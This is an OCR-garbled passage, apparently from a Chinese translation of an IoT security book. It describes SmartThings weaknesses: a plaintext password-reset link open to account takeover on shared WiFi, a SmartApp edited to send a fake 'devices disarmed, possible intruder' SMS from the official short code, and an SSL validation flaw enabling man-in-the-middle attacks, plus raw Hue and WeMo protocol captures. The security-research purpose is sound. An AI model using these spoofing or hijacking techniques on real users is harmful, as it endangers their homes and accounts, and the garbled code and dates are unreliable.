我 们 希望 SmartThings 和 其 他 新 兴 的 物 联网 制造 商 采用 双 因素 身份 验证 来 提高 他 们 的 设计 ， 从 而 使 攻击 者 无 法 使 用 传统 的 攻击 方法 破坏 物理 安全 ， 例 如 ,钓鱼 和 病毒 感 


明文 密码 重 置 链接 


由 SmartThings 应 用 程序 发 送 的 明文 密码 传送 链接 ， 能 够 被 黑客 用 作用 户 登录 和 凭据。 如 图 4-10 所 示 ， 要 求 密码 重 置 的 用 户 发 送 密 码 恢复 电子 邮件 ， 邮 件 内 包含 一 个 可 点 击 
的 链接 (如 图 4-9 所 示 ) 。 这 个 链接 (如 前 面 所 述 以 网 页 http://mandrillapp.com/track/click/30028387/graph.api.smartthings.com 的 形式 呈现 ) 没有 使 用 安全 传输 层 协议 
(TLS) ， 而 是 以 明文 的 方式 通过 本 地 网 络 和 国际 互联 网 。 


用 户 被 重新 定向 到 一 个 使 用 TLS 的 链接 (如 前 面 所 述 以 网 页 https://graph.api.smartthings.com/register/resetPassword 的 形式 呈现 ) 。 然 而 ， 任 何 接 入 局 域 WiFi 网 络 的 
人 ， 都 能 够 获取 到 用 户 点 击 的 原始 链接 ， 如 咖啡 馆 的 公共 无 线 网 络 ， 攻 击 者 一 旦 获取 该 链接 ， 便 可 以 在 受害 者 更 改 密码 之 前 重 置 密码 。 密 码 重 置 后 ， 密 码 重 置 链接 就 失效 了 ， 
用 户 必 须 提 交 新 的 请 求 。 


在 这 种 情况 下 ， 可 以 提出 一 个 论点 ， 对 潜在 攻击 者 来 说， 在 咖啡 馆 等 待 受 害 者 忘掉 自己 的 密码 并 提交 一 个 重 置 申 请 来 说 是 困难 的 。 然 而 ， 一 个 有 针对 性 的 攻击 ， 攻 击 者 和 
受害 者 在 同一 无 线 网 络 中 ， 攻 击 者 能 够 以 用 户 的 名 义 提交 请 求 进行 初始 化 密码 重 置 ， 如 图 4-9 所 示 。 受 害 者 很 可 能 惊讶 密码 重 置 邮件 ， 但 尽管 如 此 ， 可 能 会 认为 是 
SmartThings 系 统 故 障 并 继续 重 置 过 程 ， 在 这 种 情况 下 ， 攻 击 者 获取 初始 链接 并 接管 该 账户 。 除 此 之 外 ， 在 受害 者 和 mandrillapp.com 网 站 之 间 的 网 络 设备 的 接 入 者 ， 也 能 够 
获取 到 初始 链接 并 危及 用 户 的 SmartThings 账 户 安全 。 


43.2 ”滥用 物理 路 径 


即将 到 来 的 物 联网 时 代 必 将 连接 我 们 的 物理 世界 和 线 上 虚拟 空间 。 通 过 本 书 前 几 章 的 描述 ， 我 们 已 经 见证 了 : 在 Facebook 上 使 用 IFTTT 触 发 器 ， 可 以 控制 灯泡 ; 使 用 移动 
终端 发 送 伴侣 电子 钥匙 ， 可 以 打开 物理 门 ; 存储 物 联网 物理 实体 的 信息 到 远程 服务 商 ， 如 graph.api.smartthings.com 网 站 。 


SmartThings 团 队 已 经 发 行 了 它 的 概念 版 “物理 图 谱 ” ， 未 来 将 作为 一 个 平台 为 物 联网 的 各 种 物件 服务 : 


我 们 相信 ，SmatrtThings 接 下 来 引领 的 网 络 变革 将 是 创建 物理 图 谱 ，Q 这 或 许 会 极 大 地 改变 生活 ; 我 们 周围 的 物理 世界 变 得 数字 化 、 具 有 连通 性 和 可 编程 性 。 


无 论 你 称 之 为 物 联网 ， 传 感 器 网 络 或 家 庭 生活 自动 化 ， 这 对 我 们 的 生活 、 工 作 和 娱乐 都 意义 深远 。 核 心 是 要 维持 这 个 生态 系统 的 健康 ， 就 必须 保证 其 开放 性 。 一 个 开放 的 
物理 图 谱 是 连接 人 们 的 创新 、 发 明和 才智 的 唯一 桥梁 ， 这 涉及 设备 制造 者 、 硬 件 生产 者 、 开 发 人 员 ， 以 及 每 天 工作 改变 我 们 现在 和 未 来 生活 的 人 。 


SmartThings 采 用 基于 Web 的 集成 开发 环境 (IDE) ， 带 来 了 “物理 世界 的 连通 性 和 可 编程 性 ”的 愿景 生活 。 使 用 这 个 免费 工具 ， 用 户 可 以 方便 地 对 他 们 的 物 联 网 设备 进 
行 编程 ， 根 据 个 人 要 求 完成 任务 定制 。 


任何 人 都 可 以 免费 注册 一 个 smartThings 开 发 者 账户 ， 并 使 用 IDE 创 建 程序 控制 物 联网 设备 。 如 图 4-12 所 示 ， 开 发 人 员 可 以 通过 选择 各 种 smartApps 实 例 快速 构建 程序 。 


à graph.api.smartthings.com/ida/ap p/editor/ 


Show Nagation 


My Locations My Hubs My Devices My Smartapps i My Fublicanon Requests Logs Documentation 


Prowse 


loT Testing Save Publish IDESetings — Apps S 


hared Smeartápps 


[** 
IoT Testing Browse Shared Smart^pps 


Copyright 2014 Nitesh Dhanjani 
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aJ 
definition( i 
name: “IoT Testing", Button Controller 
namespace: , 
author: "Nitesh Dhanjani", Carpool Notifier 
description: "This is a test app.", 
category: "Safety & Security", Curling Iron 
iconUrl: "https://s3.amazonaws.com/smartapp-icons/Convenience/Cat-Convenience.png", 
iconX2Url: "https://s3.amazonaws.com/smartapp-icons/Convenience/Cat-Convenience82x. Darken Behind Me 


Douhle Tap 
preferences ( » " - 
aection( "Title") 1 Dropcam (Connect) 
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} Fiier Care: Daily Rautine 


def installed|[) ( Elder Care: Slip & Fal 
log.debug "Installed with settings: $|settings)" ' 
Feed My Pat 
initialize(| 
Flood Alert! 


图 4-12: SmartThings 集 成 开发 环境 


值得 一 提 的 是 ，SmartThings 团 队 已 经 决定 对 用 户 和 开发 商 开 放 一 个 免费 的 工具 ,但 是 从 安全 的 角度 来 看 ， 确 保平 台 不 能 被 恶意 实体 滥用 就 变 得 更 力 
从 SmartApps 实 例 库 中 获得 的 Text Me When It Opens 程 序 : 


了 。 例 如 ， 查 看 


/** 
* Text Me When It Opens 
* 
* Author: SmartThings 
x 
definition( 
name: "Text Me When It Opens", 
namespace: "smartthings", 
author: "SmartThings", 
description: "Get a text message sent to your phone when an open/close sensor 
is opened.", 
category: "Convenience", 
iconUrl: "https://s3.amazonaws.com/smartapp-icons/Meta/window contact.png", 
iconX2Url: "https://s3.amazonaws.com/smartapp-icons/Meta/ 
window contact82x.png" 


) 
preferences ( 
section("When the door openshttp://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16123/OEBPS/Text/...") ( 
input "contactl", "capability.contactSensor", title: "Where?" 
} 


section("Text me athttp://www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/16123/OEBPS/Text/...") ( 
input "phonel", "phone", title: "Phone number?" 
} 


} 


def installed() 
( 


} 


def updated() 
{ 


subscribe (contactl, "contact.open", contactOpenHandler) 


unsubscribe () 
subscribe (contactl, "contact.open", contactOpenHandler) 


} 


def contactOpenHandler (evt) { 
log.trace "S$evt.value: S$evt, $settings" 
log.debug "$contactl was opened, texting $phonel" 
sendSms (phonel, "Your $(contactl.label ?: contactl.name) was opened") 


这 段 程序 设置 了 一 个 虚拟 的 连接 (仿真 smartSense Multi Sensor) ， 可 以 使 用 IDE 进 行 切换 。 一 旦 连接 被 切换 到 打开 状态 ， 调 用 contactOpenHandler (evt) 中 的 代 
码 ， 相 反 调用 sendSms 服 务 发 送 短 信 。 


再 看 图 4-7。 注 意 到 SmartThings 服 务 使 用 512-69 这 样 一 个 短 号 码 ( 像 电 话 号 码 ， 但 实际 是 短信 ) 。 如 果 世 界 上 任何 人 (即使 那些 没有 SmartThings 产 品 的 人 ) 要 注册 一 


个 免费 的 smartThings 开 发 者 账户 ， 并 使 用 Text Me When It Opens 程 序 ， 他 们 可 以 利用 这 个 测试 功能 来 发 送 任何 内 容 的 短信 给 世界 上 任何 一 个 人 ， 它 也 将 显示 为 源 自 短 号 
18512-69, 


现在 想象 一 下 ， 如 果 有 人 将 sendSms 代 码 改 为 以 下 内 容 : 


sendSms (phonel, "WARNING: Systems malfunction. All devices disarmed. 
Possible intruder activity.") 


在 这 种 情况 下 (如 图 4-13 所 示 ) ， 用 户 将 收 到 令 人 害怕 的 警告 信息 ， 同 样 来 自 512-69 短 号 码 。 想 象 一 下 ， 后 半夜 当 你 睡觉 的 时 候 或 者 远离 家 的 时 候 收 到 这 样 一 条 短信 
息 。 以 前 曾经 从 SmartThings 系 统 得 到 过 短信 的 用 户 很 有 可 能 相信 这 条 信息 ， 因 为 它 从 相同 的 短 号 码 发 来 。 事 实 上 ，SmartThings 使 用 的 短 号 码 最 近 更 改 到 512-69 后 ， 用 户 就 
在 论坛 上 询问 过 这 个 改变 ， 表 明 他 们 的 确 意识 到 并 相信 这 条 信息 源 自 这 个 号 码 。 
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< Messages 512-69 Details 


WARNING: Systems malfunction. All devices 
disarmed. Possible intruder activity. 


图 4-13: 发 送 给 SmartThings 用 户 的 令 人 害怕 的 短信 息 


许多 用 户 可 能 选择 使 用 推送 通知 服务 代替 接收 短信 通知 ， 如 苹果 推送 认证 和 Google 云 消息 。 不 过 有 些 人 更 喜欢 短信 ， 需 要 时 SmartThings 为 了 维修 会 建议 用 户 关闭 基于 
非 文 本 的 通知 ， 实 际 公告 如 图 4-14 所 示 。 在 这 样 一 个 时 间 段 内 ， 对 于 入 侵 者 来 说 ， 利 用 这 种 情况 是 完美 的 。 


© ^ @ Push Notification Scheduled Maintenance Tonight 一 
S oO A 4 > 


Hello: 
Just a heads-up that our push notification service is scheduled for maintenance on 
October 17 from 1 to 5 a.m., Eastern Daylight Time (from 10 p.m. October 16 to 2 


a.m. October 17, Pacific Daylight Time). 


While this will not affect your SmartThings functionality, you won't be able to receive 
push notifications during this timeframe. 


If you've set up any notifications that are especially important during these hours, we 
recommend that you update your settings in the SmartThings app to receive a text 
message instead of a push notification. 


Thanks, 


The SmartThings team 


Q SmartThings 


图 4-14: SmartThings 发 送 的 电子 邮件 ， 通 知 用 户 维修 日 程 安排 


有 这 样 一 个 例子 ， 显 示 了 这 个 系统 是 如 何 被 滥用 的 。 一 个 怀 有 恶意 的 人 ， 知 道 你 的 手机 号 码 以 及 知道 你 依赖 SmartThings 产 品 进行 远程 监控 来 确保 家 人 安全 ， 并 能 够 利用 
这 种 情况 引导 你 离开 一 个 特定 的 位 置 (例如 你 的 办 公 室 ) ， 回 家 查看 你 的 家 人 ， 因 为 你 已 经 收 到 了 来 自 martThings 短 号 码 的 短信 。 


另外 ， 垃 圾 邮件 发 送 者 可 以 利用 免费 短信 发 送 功能 ， 利 用 SmartThings 短 号 码 给 任何 人 发 送 免费 的 文本 广告 。 


这 里 的 教训 是 ， 与 文本 信息 相关 的 输入 号 码 无 法 再 用 来 建立 可 信 或 证 明 真 实 性 。 一 种 解决 方案 是 : 要 求 用 户 输入 四 位 数字 ， 这 四 位 数字 将 体现 在 由 smartThings 发 出 的 每 
个 文本 消息 里 ， 并 教会 用 户 忽略 那些 不 包含 四 位 数字 前 缀 的 信息 。 然 而 ， 这 给 使 用 者 造成 了 更 大 的 负担 ， 并 且 复 杂 化 了 用 户 与 产品 之 间 互 用 性 。 然 而 如 果 仍 然 继续 使 用 传统 的 
协议 ， 如 文本 消息 ， 这 是 要 付出 代价 的 。 


以 数据 为 驱动 的 推送 通知 方式 已 证 明 更 加 可 靠 ， 因 为 他 们 依赖 于 加 密 和 认证 的 证 书 ， 并 且 更 难以 欺骗 。 


4.1.3 SmartThings 的 SSL 证 书 验 证 漏洞 


2015 年 3 月 ， 题 为 “SmartThings SSL 证 书 验证 漏洞 ”的 报告 曝光 了 一 个 关于 SmartThings Hub 的 关键 问题 : 

SmartThings Hub 与 SmatrtThings 后 端 服务 器 之 间 的 通信 使 用 SSL 加 密 。 然 而 ， 使 用 的 SSL 客 户 端 应 用 不 验证 在 初始 信息 交换 过 程 中 由 服务 器 发 送 的 SSL 证 书 的 真实 性 。 一 个 有 具 
有 监测 和 拦截 流量 能 力 的 攻击 者 ， 可 以 为 集线器 提供 一 个 “伪造 ”的 SSL 证 书 ， 自 称 是 一 个 合法 的 后 端 服务 器 ， 这 个 证 书 将 被 集线器 认为 是 真正 的 证 书 而 接受 。 这 样 就 可 以 进 
行 “ 中 间 人 ”攻击 ， 不 知 不 觉 ， 攻 击 者 实现 转播 客户 端 和 服务 器 之 间 的 通信 。 在 这 种 情况 下 ， 对 攻击 者 能 够 获得 未 加 密 形 式 的 通信 ， 并 且 能 够 进行 修改 和 中 断 ， 有 效 地 击败 
SSL 加 密 所 提供 的 保护 。 


安全 和 认证 通信 对 Smatrtthings 这 样 的 平台 来 说 是 重要 的 ， 可 作为 家 庭 安全 系统 的 一 部 分 。 例 如 ， 当 SmartSense 开 / 关 传 感 器 开 着 的 时 候 ， 集 线 器 传送 一 个 数据 包 。 攻 击 者 可 
以 通过 简单 地 不 转发 此 数据 包 阻 止 来 自 每 一 个 到 达 SmartThings 后 台 服务 器 的 事件 通知 ， 相 应 地 ， 也 能 够 阻止 传送 到 终端 用 户 的 通知 。 


一 个 潜在 的 缓解 因素 是 集线器 缺少 能 够 使 用 的 WiFi 连 接 ， 攻 击 者 需要 物理 连接 到 集线器 所 在 网 络 ， 或 是 在 互联 网 传输 过 程 中 进行 拦截 ， 缺 乏 WiFi 连 接 使 得 通信 拦截 更 加 轩 
难 。 


然而 这 并 不 能 提供 完整 的 保护 ， 因 为 一 些 家 庭 网 络 使 用 WiFi 网 桥 或 中 继 器 。 攻 击 者 可 能 也 会 损害 网 络 上 的 其 他 设备 ， 例 如 对 路 由 器 或 个 人 媒体 服务 器 实施 流量 拦截 。 


像 这 样 的 安全 漏洞 能 够 允许 攻击 者 在 同一 WiFi 网 络 中 (或 者 是 在 用 户 的 家 庭 网 络 和 SmartThings 网 络 路 由 器 之 间 的 设备 上 ) 修改 和 影响 集线器 和 SmartThings 网 络 之 间 所 
有 的 通信 。 攻 击 者 能 够 滥用 这 个 漏洞 去 触发 或 消除 用 户 设置 的 警报 ， 这 样 就 把 SmartThings 用 户 的 人 身 安全 置 于 危险 之 中 。 


好 消息 是 ，SmartThings 团 队 与 研究 者 一 起 合作 ， 确 定 了 问题 并 采用 安全 补丁 作为 响应 : 
10/11/14- 给 供应 商 提 交 原 始 报告 

11/11/14- 报 告 确认 

11/21/14-3 1] 73. 

01/29/15- 更 新 园 件 开始 

03/04/15- 公 开 披 露 


漏洞 的 研究 者 们 的 耐心 应 该 给 予 肯定 ， 与 SmartThings 合 作 并 在 问题 暴露 之 前 等 待 补丁 的 推出 。 


这 是 一 个 很 好 的 例子 ， 展 示 了 物 联网 产品 的 安全 问题 是 如 何 升级 成 为 安全 漏洞 的 ， 攻 击 者 是 如 何 能 够 利用 这 些 漏洞 构造 “中 间 人 ”攻击 的 。 然 而 ， 这 也 是 一 个 很 好 的 例 
子 ， 说 明 像 smartThings 这 样 的 物 联网 供应 商 是 如 何 与 安全 研究 者 合作 去 了 解 问题 ， 并 且 推 出 固件 补丁 去 保护 他 们 的 客户 的 。 


42 不 安全 的 互 用 性 导致 不 安全 


在 合适 的 时 候 可 以 给 予 别 人 信任 。SmartThings 应 该 提高 其 产品 套件 的 认证 能 力 和 安全 地 实现 传统 服务 ， 例 如 文本 消息 的 免费 开发 套件 。 就 是 说 ， 不 像 Philips hue 或 是 
Belkin WeMo 产 品 的 案例 ，SmartThings 架 构 不 会 毫 无 保留 地 相信 本 地 网 络 。 


Belkin WeMo 婴 儿 产品 和 WeMo 开 关 产 品 的 例子 中 ， 相 同 局 域 网 内 的 任何 设备 更 容易 互相 连接 ， 并 且 给 设备 发 送 指令 而 无 需 任 何 进一步 的 认证 。 然 而 在 SmartThings 
的 例子 中 ， 集 线 器 和 应 用 程序 互相 通信 ， 建 立 出 站 连接 到 graph.api.smartthings.com。 通 过 这 种 方式 ， 每 一 次 更 新 和 发 送 指令 根据 建立 和 验证 会 话 来 验证 SmartThings 用 户 
账户 。 这 使 得 SmartThings 方 法 更 加 安全 ， 因 为 它 不 允许 已 经 被 感染 病毒 的 网 上 工作 站 或 者 其 他 设备 直接 操作 SmartThings 设 备 。 


正如 前 面 提 到 的 ， 除 了 自己 的 设备 ，SmartThings 系 统 现 在 支持 与 第 三 方 物 联网 设备 的 互 用 性 。 在 SmartThings 实 验 室 ，SmartThings 应 用 程序 和 集线器 能 够 用 来 控制 
Philips hue 电 灯 系 统 、WeMo 交 换 设备 和 其 他 设备 。 给 予 SmartThings 信 任 是 因为 通过 graph.api.smartthings.com 的 安全 路 由 信息 完全 不 信任 本 地 网 络 。 通 过 了 解 
SmartThings 是 如 何 与 Philips 和 Belkin 产 品 互 用 的 ， 我 们 将 分 析 这 些 安 全 设计 原则 是 否 起 了 阻碍 作用 。 


4.2.1 SmartThings 和 hue 电 灯 


使 用 SmartThings 应 用 程序 搜索 并 连接 到 Philips hue 网 桥 ( 见 第 1 章 ) 。 为 了 做 到 这 一 点 ， 在 SmartThings 应 用 软件 仪表 盘 下 方 触摸 “+” 按 钮 。 下 一 步 ， 选 择 Light 
Bulbs 一 Philips hue Light Bulb， 屏 幕 将 看 起 来 如 图 4-15 所 示 。 


通过 发 送 以 下 SSDP 查 询 ，SmartThings 集 线 器 开始 寻找 本 地 网 络 的 hue 网 桥 : 


M-SEARCH * HTTP/1.1 

MX: 1 

MAN: "ssdp:discover" 
HOST:239.255.255.250:1900 

ST: urn:schemas-upnp-org:device:basic:1 


»- 令 KL NE, 


© Things Q 


Philips hue Light Bulb 


Connect Now 


Top Alerts and Actions 


Buy Now 


图 4-15: SmartThings 应 用 程序 连接 到 Philips hue I 4f 
hue 网 桥 响应 查询 ， 并 标识 自己 : 


HTTP/1.1 200 OK 

CACHE-CONTROL: max-age-100 

EXT: 

LOCATION: http://10.0.1.2:80/description.xml 
SERVER: FreeRTOS/6.0.5, UPnP/1.0, IpBridge/0.1 
ST: upnp:rootdevice 


现在 通过 发 出 以 下 GET 请 求 ，SmartThings 集 线 器 从 hue 网 桥 获 取 文 件 /description.xml: 


GET /description.xml HTTP/1.1 

Accept: */* 

User-Agent: Linux UPnP/1.0 SmartThings 
HOST: 192.168.2.2:80 


hue 网 桥 响 应 : 


HTTP/1.1 200 OK 
Content-type: text/xml 


Connection: Keep-Alive 


<?xml version-"1.0" encoding-"UTF-8" ?> 

«root xmlns-"urn:schemas-upnp-org:device-1-0"» 
«specVersion» 

«major»1«/major» 

«minor»0«/minor» 

X«/specVersion» 

«URLBase»http://10.0.1.2:80/«/URLBase» 

«device» 
«deviceType»urn:schemas-upnp-org:device:Basic:1«/deviceType» 
«friendlyName»Philips hue (10.0.1.2)«/friendlyName» 
«manufacturer»Royal Philips Electronics«/manufacturer» 
«manufacturerURL-»http://www.philips.com«/manufacturerURL» 
«modelDescription»Philips hue Personal Wireless Lighting«/modelDescription» 
«modelName»Philips hue bridge 2012«/modelName» 
«modelNumber»929000226503«/modelNumber» 
«modelURL»http://www.meethue.com«/modelURL» 
«serialNumber» [DELETED] </serialNumber> 
<presentationURL>index.html</presentationURL> 
<iconList> 

<icon> 

<mimetype>image/png</mimetype> 

<height>48</height> 

<width>48</width> 

<depth>24</depth> 

<url>hue logo 0.png</url> 

</icon> 

<icon> 

<mimetype>image/png</mimetype> 

<height>120</height> 

«width»120«/width» 

«depth»24«/depth» 

<url>hue logo 3.png«/url» 

«/icon» 

«/iconList» 

«/device» 

«/root» 


在 这 一 点 上 ， 用 户 将 看 到 一 个 通知 ， 网 桥 已 经 找到 ， 如 图 4-16 所 示 。 
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Select Hue Bridge (1 found) 
Philips hue (10.0.1.2) 


图 4-16: SmartThings 应 用 软件 定位 hue 网 桥 


当 按 下 “下 一 个 ”按钮 后 ，SmartThings 集 线 器 向 hue 网 桥 发 送 以 下 POST 请 求 : 


POST /api HTTP/1.1 

Accept: */* 

User-Agent: Linux UPnP/1.0 SmartThings 
HOST: 10.0.1.2:80 

Content-Type: application/json 
Content-Length: 107 


("devicetype":"8f7ab27c-6c04-4378-b05b1-dcd4fd468815-0" , "username" :"8f7ab27c-6c04 
—-4378-b0b1-dcd4f8468815-0" ) 


devicetype 和 username 的 值 是 相同 的 ， 并 且 看 起 来 在 本 质 上 是 随机 的 。 回 想 一 下 (001.335) ， 用 户 必须 在 30 秒 钟 内 按 下 按钮 来 证 明 网 桥 的 物理 所 有 权 。 此 时 ，hue 网 桥 
将 接收 到 username 的 值 ， 随 后 smartThings 集 线 器 用 它 连 接 到 本 地 网 络 中 的 hue 网 桥 并 发 送 命令 。 


假设 用 户 按 了 hue 网 桥 上 的 按钮 ， 下 面 的 响应 将 返回 到 SmartThings 集 线 器 : 


HTTP/1.1 200 OK 

Cache-Control: no-store, no-cache, must-revalidate, post-check-0, pre-check-0 
Pragma: no-cache 

Expires: Mon, 1 Aug 2011 09:00:00 GMT 

Connection: close 


Access-Control-Max-Age: 3600 

Access-Control-Allow-Origin: * 

Access-Control-Allow-Credentials: true 
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE, HEAD 
Access-Control-Allow-Headers: Content-Type 

Content-type: application/json 


[(" success" : ("username" : "8£7ab27c-6c04-4378-b0b1-dca4£d468815-0) )] 


如 果 连 接 成 功 将 通知 用 户 ， 如 图 4-17 所 示 。 


从 现在 开始 ，SmartThings 集 线 器 能 够 给 Philips hue 网 桥 发 送 命 令 ， 通 过 在 请 求 中 总 是 包含 值 8f7ab27c-6c04-4378-b0b1-dcd4fd468815-0 作 为 授权 令 牌 。 例 如 ， 它 能 
够 发 送 一 个 POST 请 求 以 /api/8f7ab27c-6c04-4378-b0b1-dcd4fd468815-0/groups/0/ 的 形式 关 掉 所 有 的 灯 ， 如 1.3 节 所 述 。 


hue 网 桥 在 80 端 口 接收 到 达 的 连接 ， 此 连接 不 使 用 加 密 。 这 会 允许 在 局 域 网 内 的 恶意 设备 发 起 ARP 欺 骗 攻 击 ， 并 窃取 和 代理 username。 然 而 ， 这 一 结构 基于 hue 团 队 的 设 
计 。 因 为 hue 网 络 服务 连接 是 明文 的 ，SmartThings 集 线 器 除了 使 用 未 加 密 的 通信 外 别 无 选择 。 


回顾 第 1 章 ，hue 应 用 程序 早期 的 应 用 利用 智能 手机 MAC 地 址 的 MD5 哈 希 码 作 为 username。 这 是 个 坏 主意 ， 因 为 它 允 许 任何 一 个 本 地 设备 引发 永久 灭 灯 。SmartThings 
集线器 没有 犯 这 样 的 错误 。SmartThings 团 队 应 该 为 这 一 用 心 的 设计 而 受到 表扬 。 


4.2.2 SmartThings 和 WeMo 开 关 


WeMo 开 关 ( 见 3.3 节 ) 也 能 通过 SmartThings 应 用 程序 进行 控制 。 与 设置 hue 网 桥 相 同 ， 用 户 需 要 选择 应 用 软件 的 仪表 盘 屏 幕 底 端的 “+” 按 钮 ， 依 次 选择 
Switches&Dimmers 一 Belkin WeMo Switch 一 Connect Now，SmartThings 集 线 器 会 使 用 SSDP 来 搜索 开关 : 
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Linking to your hub was a success! Please 
click 'Next'! 


图 4-17: SmartThings 集 线 器 成 功 地 获得 hue 网 桥 的 授权 


M-SEARCH * HTTP/1.1 

MX: 1 

MAN: "ssdp:discover" 
HOST:239.255.255.250:1900 

ST: urn:Belkin:device:controllee:1 


WeMo 开 关 响 应 识别 : 


HTTP/1.1 200 OK 

CACHE-CONTROL: max-age-86400 

DATE: Mon, 20 Oct 2014 14:32:17 GMT 

EXT: 

LOCATION: http://192.168.2.10:49153/setup.xml 
OPT: "http://schemas.upnp.org/upnp/1/0/"; ns-01 
SERVER: Unspecified, UPnP/1.0, Unspecified 
X-User-Agent: redsonic 

ST: urn:Belkin:device:controllee:1 


此 应 用 软件 提醒 用 户 ，WeMo 开 关 已 经 定位 ， 如 图 4-18 所 示 。 按 照 预期 ，SmartThings 集 线 器 发 送 下 面 的 GET 请 求 给 WeMo 开 关 : 


GET /setup.xml HTTP/1.1 


HOST: COA8020A:C001 
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XS N 7d Papa ADEM) on VESPERE 
© Wemo (Connect) 


Select Wemo Switches 
(1 found) 


Tap to set 


Select Wemo Motions 
(0 found) 


Tap to set 


Select Wemo Light Switches 
(0 found) 


Tap to set 


图 4-18: SmartThings 应 用 软件 通知 用 户 已 经 找到 WeMo 开 关 


WeMo 开 关 响 应 : 


HTTP/1.1 200 OK 

CONTENT-LENGTH: 3767 

CONTENT-TYPE: text/xml 

DATE: Mon, 20 Oct 2014 14:32:23 GMT 
LAST-MODIFIED: Mon, 20 Oct 2014 14:26:28 GMT 
SERVER: Unspecified, UPnP/1.0, Unspecified 
X-User-Agent: redsonic 

CONNECTION: close 


<?xml version-"1.0"?» 
«root xmlns-"urn:Belkin:device-1-0"» 

XspecVersion» 

«major»1«/major» 
«minor»0«/minor» 

«/specVersion» 

«device» 
XdeviceType»urn:Belkin:device:controllee:1«/deviceType» 
«friendlyName»WeMo Switch«/friendlyName» 

«manufacturer»Belkin International Inc.«/manufacturer» 
«manufacturerURL»http://www.belkin.com«/manufacturerURL» 
«modelDescription»Belkin Plugin Socket 1.0«/modelDescription» 
«modelName»Socket«/modelName» 


«modelNumber?1.0«/modelNumber» 

«modelURL»http://www.belkin.com/plugin/«/modelURL» 
«serialNumber» [DELETED] </serialNumber> 
<UDN> [DELETED] </UDN> 

<UPC>123456789</UPC> 
«macAddress» [DELETED] «/macAddress» 
«firmwareVersion»WeMo US 2.00.2769.PVT«/firmwareVersion» 
«iconVersion»0|49153«/iconVersion» 
«binaryState»0«/binaryState» 

XiconList» 

«icon» 

«mimetype»jpg«/mimetype» 
«width»100«/width» 
Xheight»100«/height» 
«depth»100«/depth» 
«url»icon.jpg«/url» 
«/icon» 

«/iconList» 

Xservicelist» 

«service» 
XserviceType»urn:Belkin:service:WiFiSetup:l«/serviceType» 
XserviceId»urn:Belkin:serviceId:WiFiSetupl«/serviceId» 
XcontrolURL»/upnp/control/WiFiSetupl«/controlURL» 
«eventSubURL»/upnp/event/WiFiSetupl«/eventSubURL» 
«SCPDURL»/setupservice.xml«/SCPDURL» 

«/service» 

«service» 
XserviceType»urn:Belkin:service:timesync:l«/serviceType» 
XserviceId»urn:Belkin:serviceId:timesyncl«/serviceId» 
«controlURL»/upnp/control/timesyncl«/controlURL» 
«eventSubURL»/upnp/event/timesyncl«/eventSubURL» 
«SCPDURL»/timesyncservice.xml«/SCPDURL» 

«/service» 

«service» 
X«serviceType»urn:Belkin:service:basicevent:1«/serviceType» 
«serviceId»urn:Belkin:serviceId:basiceventl«/serviceld» 
«controlURL»/upnp/control/basiceventl«/controlURL» 
«eventSubURL»/upnp/event/basiceventl«/eventSubURL» 
«SCPDURL»/eventservice.xml«/SCPDURL» 

«/service» 

«service» 
XserviceType»urn:Belkin:service:firmwareupdate:1«/serviceType» 
Xserviceld»urn:Belkin:serviceId:firmwareupdatel«/serviceId» 
«controlURL»/upnp/control/firmwareupdatel«/controlURL» 
«eventSubURL-»/upnp/event/firmwareupdatel«/eventSubURL» 
«SCPDURL»/firmwareupdate.xml«/SCPDURL» 

«/service» 

«service» 
X«serviceType»urn:Belkin:service:rules:1«/serviceType» 
«serviceId»urn:Belkin:serviceId:rulesl«/serviceId» 
«controlURL»/upnp/control/rulesl«/controlURL» 
«eventSubURL»/upnp/event/rules1«/eventSubURL» 
«SCPDURL»/rulesservice.xml«/SCPDURL» 

«/service» 


«service» 
XserviceType»urn:Belkin:service:metainfo:1«/serviceType» 
X«serviceId»urn:Belkin:serviceId:metainfol«/serviceId» 
«controlURL»/upnp/control/metainfol«/controlURL» 
«eventSubURL»/upnp/event/metainfol«/eventSubURL» 
«SCPDURL»/metainfoservice.xml«/SCPDURL» 

«/service» 


«service» 
«serviceType»urn:Belkin:service:remoteaccess:1«/serviceType» 
«servicelId»urn:Belkin:serviceId:remoteaccessl«/serviceld» 
«controlURL»/upnp/control/remoteaccess1«/controlURL» 
«eventSubURL-»/upnp/event/remoteaccess1«/eventSubURL» 
«SCPDURL»?/remoteaccess.xml«/SCPDURL» 

«/service» 


«service» 
X«serviceType»urn:Belkin:service:deviceinfo:l1«/serviceType» 
X«serviceId»urn:Belkin:serviceId:deviceinfol«/serviceId» 
«controlURL»/upnp/control/deviceinfol«/controlURL» 
«eventSubURL»/upnp/event/deviceinfol«/eventSubURL» 
«SCPDURL»/deviceinfoservice.xml«/SCPDURL» 

«/service» 


«/serviceList» 
XpresentationURL»/pluginpres.html«/presentationURL» 
«/device» 
«/root» 


看 起 来 熟悉 么 ”这 与 官方 WeMo 应 用 软件 请 求 文件 /setup.xml 完 全 相同 (013.3155) 。 这 看 起 来 符合 逻辑 和 预期 。 重 申 这 一 点 证 明 : SmartThings 应 用 程序 与 WeMo 应 用 
程序 和 WeMo 开 关 在 进行 交互 操作 时 遵循 相同 的 协议 ，WeMo 开 关 即 第 三 方 设备 。 


SmartThings 应 用 程序 能 够 用 于 创建 用 户 触发 ， 如 图 4-19 所 示 。 在 这 种 情况 下 ， 每 次 打开 贴 有 SmartThings 传 感 器 的 门 ， 连 接 到 MeMo 开 关 的 电灯 会 被 打开 。 如 果 5 分 钟 
内 没有 活动 电灯 会 关闭 。 
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图 4-19: SmartThings 应 用 程序 控制 WeMo 开 关 


一 旦 设置 好 后 ，SmartThings 集 线 器 能 够 直接 连接 到 开关 发 送 命 令 。 例 如 ， 集 线 器 能 够 给 开关 传送 以 下 请 求 : 


POST /upnp/control/basiceventl HTTP/1.1 

SOAPACTION: "urn:Belkin:service:basicevent:1#GetBinaryState" 
Content-Length: 277 

Content-Type: text/xml; charset-"utf-8" 

HOST: 192.168.2.10:49153 

User-Agent: CyberGarage-HTTP/1.0 


<?xml version-"1.0" encoding-"utf-8"?» 

Xs:Envelope xmlns:s-"http://schemas.xmlsoap.org/soap/envelope/" 
S:encodingStyle-"http://schemas.xmlsoap.org/soap/encoding/"» 
<s:Body> 

<u:GetBinaryState xmlns:u-"urn:Belkin:service:basicevent:1"» 
</u:GetBinaryState> 

</s:Body> 

</s:Envelope> 


GetBinaryState 请 求 的 目 是 询问 开关 的 状态 。 开 关 响 应 以 下 内 容 : 


